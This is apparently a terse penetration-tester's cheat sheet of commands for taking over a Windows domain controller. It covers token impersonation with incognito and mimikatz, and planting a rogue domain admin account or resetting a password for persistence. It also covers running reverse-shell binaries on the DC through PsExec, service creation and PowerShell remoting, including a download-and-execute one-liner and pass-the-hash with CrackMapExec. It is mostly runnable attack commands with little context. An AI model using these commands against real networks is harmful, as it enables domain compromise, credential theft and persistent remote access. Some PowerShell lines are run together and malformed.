.\incognito.exe list_tokens -u (find domain\admin delegation token)
.\incognito.exe execute -c "domain\admin" .\shell.exe
>> with domain admin shell, pivot to DC
mimikatz impersonate
.\mimikatz.exe " " " " "exit"
token::list (to find any domain admin)
token::elevate /domainadmin (seek and impersonate any domain admin that it can find)
token::run /process:"C:\temp\shell.exe"
>> with domain admin shell, pivot to DC
Create domain admin account as a DC admin / admin on DC ser so that no need the actual DC admin creds for persistence,
or change password net user adminuser pass123! /domain
smb (with dc user/admin creds)
dir \\DC01\c$ (to check if have access to dc)
PSexec.exe \\DC01 (-s) -c C:\temp\rev.exe -d -accepteula
sc pivot (smb) - DC admin
create service on the remote ser and start
query, stop, start, delete, and add system services
$dcs = NEW-PSSession -Computer SANDBOXDCInvoke-Command-Session $dcs -ScriptBlock {ipconfig}(validate we can exec cmd to DC remotely)Copy-Item"C:\Users\Public\shell.exe"-Destination "C:\Users\Public\"-ToSession $dcs*setup listener$dcs = NEW-PSSession -Computer SANDBOXDCInvoke-Command-Session $dcs -ScriptBlock {C:\Users\Public\shell.exe}
(normal to hang)Invoke-Command-ComputerName dc.domain.local -ScriptBlock {hostname}Invoke-Command-ComputerName dc.domain.local -ScriptBlock {iex(new-object net.webclient).downloadstring('')}or download shell.exe and then exec
CME with local admin hash (from HKLM SAM SYS :LMHASH) to impersonate domain admin for accessing dc with rev.ps1